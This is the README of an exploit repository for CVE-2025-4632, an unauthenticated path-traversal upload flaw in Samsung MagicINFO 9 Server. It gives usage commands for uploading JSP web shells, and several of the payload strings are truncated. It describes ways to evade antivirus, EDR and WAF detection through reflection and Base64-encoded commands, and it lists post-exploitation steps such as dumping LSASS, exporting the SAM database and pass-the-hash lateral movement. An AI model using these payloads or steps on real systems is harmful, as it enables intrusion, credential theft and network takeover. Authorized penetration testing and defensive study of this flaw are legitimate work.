## https://sploitus.com/exploit?id=2C3563BC-D6C6-5CE5-AEDB-7765A772CDF6
# Samsung MagicINFO 9 Server Exploit (CVE-2025-4632)
This repository contains a Python replication script for CVE-2025-4632, an Unauthenticated Remote Code Execution (RCE) vulnerability in Samsung MagicINFO 9 Server (versions prior to 21.1052).
The vulnerability exists due to an improper limitation of a pathname in the `SWUpdateFileUploader` servlet. By utilizing path traversal (`../../`), an unauthenticated attacker can write arbitrary files with `SYSTEM` authority, leading to full server compromise.
## Credits & Acknowledgements
* **Original Discovery & Template Author:** `s4e-io` (from the ProjectDiscovery Nuclei community ([http/cves/2025/CVE-2025-4632.yaml](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-4632.yaml))).
* **Methodology:** This script is a direct programmatic implementation of the logic defined in the `CVE-2025-4632` Nuclei template.
## How it Works
The script automates the process of generating a legitimate-looking device update request. It exploits the `fileName` parameter by injecting directory traversal sequences to break out of the intended upload directory and write a file directly to the web root (`/MagicInfo/`).
The script performs two steps:
1. **POST Request:** Sends the payload to `/MagicInfo/servlet/SWUpdateFileUploader` with the traversal path.
2. **GET Request (Verification):** Automatically attempts to access the uploaded file at `/MagicInfo/` to confirm successful exploitation.
## Usage
```bash
python exploit_magicinfo.py -t -f -d
```
### Arguments:
* `-t` / `--target`: The base URL of the target (e.g., `http://192.168.1.100:7001`).
* `-f` / `--filename`: The name of the file to create (e.g., `shell.jsp`).
* `-d` / `--data`: The raw content to write into the file.
---
## Payload Examples for Penetration Testing
The following payloads were successfully tested during assessment activities. They are designed to prove impact while navigating endpoint security controls.
### 1. Benign Proof of Concept (Impact Verification)
Used to safely confirm JSP execution without triggering Antivirus or EDR.
```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f poc.jsp -d ''
```
*Access:* `http://:7001/MagicInfo/poc.jsp`
### 2. Standard Command Execution Shell
A standard JSP web shell. **Note:** This may be caught and quarantined by modern AV/EDR solutions resulting in a `404 Not Found` upon verification.
```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f cmd.jsp -d '"); while ((l = in.readLine()) != null) { out.println(l); } out.print(""); } %>'
```
*Access:* `http://:7001/MagicInfo/cmd.jsp?c=whoami`
### 3. Obfuscated Command Execution (EDR/AV Bypass)
Used when the standard shell is blocked. This payload uses Java Reflection to hide the `Runtime.getRuntime().exec` signature from static analysis.
```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f bypass.jsp -d '"+(s.hasNext()?s.next():"")+"");} %>'
```
*Access:* `http://:7001/MagicInfo/bypass.jsp?c=whoami /all`
### 4. Advanced Base64 Obfuscated Shell (WAF & URL Parsing Bypass)
**Highly Recommended for Complex Commands:** If you encounter `400 Bad Request` errors when trying to run commands with spaces, backslashes, or special characters (e.g., `dir c:\`), the server's strict URI validation or a WAF is blocking the request.
This advanced payload expects the command to be **Base64 encoded** in the URL. It decodes it server-side before execution, completely bypassing URL filtering and obscuring the command from network monitors.
```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f b64.jsp -d '"+(s.hasNext()?s.next():"")+"");} %>'
```
**Usage Examples:**
Encode your command to Base64 locally (e.g., `echo -n "dir c:\" | base64`), then pass it to the `c` parameter.
* `whoami` -> `d2hvYW1p`
* *Access:* `http://:7001/MagicInfo/b64.jsp?c=d2hvYW1p`
* `tasklist /svc` -> `dGFza2xpc3QgL3N2Yw==`
* *Access:* `http://:7001/MagicInfo/b64.jsp?c=dGFza2xpc3QgL3N2Yw==`
* `dir c:\` -> `ZGlyIGM6XA==`
* *Access:* `http://:7001/MagicInfo/b64.jsp?c=ZGlyIGM6XA==`
---
## Post-Exploitation & Risk Reporting
When running the `whoami` command via the shell, you will likely observe `NT AUTHORITY\SYSTEM`. In an Active Directory environment, this access level is sufficient to:
1. Extract Local Security Authority Subsystem Service (LSASS) memory to harvest Domain Admin credentials.
2. Export the local SAM database for Pass-the-Hash lateral movement.
3. Query Active Directory for misconfigurations using the host's machine account.
*Disclaimer: This script is for educational and authorized penetration testing purposes only.*